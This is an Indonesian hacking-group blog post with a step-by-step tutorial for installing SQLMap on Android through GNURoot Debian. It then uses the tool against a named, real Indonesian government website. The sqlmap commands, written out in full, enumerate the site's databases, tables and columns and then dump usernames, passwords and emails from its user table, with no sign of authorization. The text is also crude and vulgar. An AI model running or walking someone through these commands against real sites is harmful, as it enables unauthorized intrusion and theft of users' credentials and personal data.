Menjalankan SQLMap di GNURoot Android

Thursday, August 17, 2017

Hai para hacker dan yang bukan hacker udah lah tong berhenti coli nape mending lu belajar bareng GSH disini :*

Kali ini gw mau jelasin tutor yang sedikit berbeda dari biasanya yaitu menjalankan SQLMap di android

buat kalian yang belum punya GNURoot Debian sebaiknya kalian baca tutorial ini dulu : Klik Di Sini ya

jika sudah baca dan dipraktekkan kalian bisa lanjutkan untuk membaca tutorial ini :* dan buat yg mastah tanpa baca tutorial yang sebelum nya jg gpp.

pertama pastikan GNURoot terinstall


Kemudian buka GNURoot Debian


alangkah baiknya buat folder khusus pentest dulu untuk menampung tool-tool hacking nanti nya dengan memasukkan perintah mkdir pentest kemudian tekan enter.


kemudian masukkan ke dalam folder pentest tadi dengan memasukkan perintah cd pentest kemudian tekan enter


kemudian install SQLMap dengan memasukkan perintah

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

kemudian tekan enter


biarkan proses instalasi berjalan


setelah selesai masuk ke folder sqlmap dengan memasukkan perintah cd sqlmap kemudian tekan enter


beri hak akses dengan memasukkan perintah chmod 777 sqlmap.py kemudian tekan enter


kemudian update dulu sqlmap nya dengan memasukkan perintah ./sqlmap.py --update kemudian tekan enter


mari kita coba langsung praktek live pentest dengan target nya https://djk.esdm.go.id/index.php/detail-berita?ide=4325 dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 --dbs

kemudian tekan enter


biarkan proses scanning berjalan


muncul wizard buat eksekusi jenis exploitasi nya ya tekan C kemudian tekan enter


biarkan proses injeksi SQL terus berjalan secara otomatis


dan database nya ketemu cek gambar dibawah biar jelas


disini gw mau injeksi SQLnya di database djk3 untuk ngecek isi tabel SQL nya jadi perintah nya adalah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 --table

kemudian tekan enter


setelah proses scanning selesai kemudian muncul lah tabel SQL nya dari database djk3


disini gw mau injksi SQL di tabel djk3_user buat cek isi kolom nya dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user --columns

kemudian tekan enter 


biarkan proses scanning dan injeksi berjalan


aahhh.... kimochi ketemu kolom nya :v


kemudian gw mau dump isi kolom nya djk3_user tadi dengan cara memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user -C id,username,password,email --dump

kemudian tekan enter.


done :v


gimana ya cara nya penggunaan nya kurang lebih sama dengan yang artikel sebelum nya yang di sini hanya saja beda nya platform aja gw bikin tutorial ini biar lu pade yang kerjaan nya sering koar-koar sambil coli ini ngerti.

oke sekian dan terimakasih

salam ngent*t


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Saya orang nya sederhana dan biasa saja gak lebih

Related Post

Next
Previous
Click here for Comments

1 comments:

avatar

bang kok ane gak bisa cd sqlmao ya maka keluar nya such file or directory ??
salah di mana bang ??

*Komentar Dengan Sopan !
*Jangan OOT
*I am Just Newbie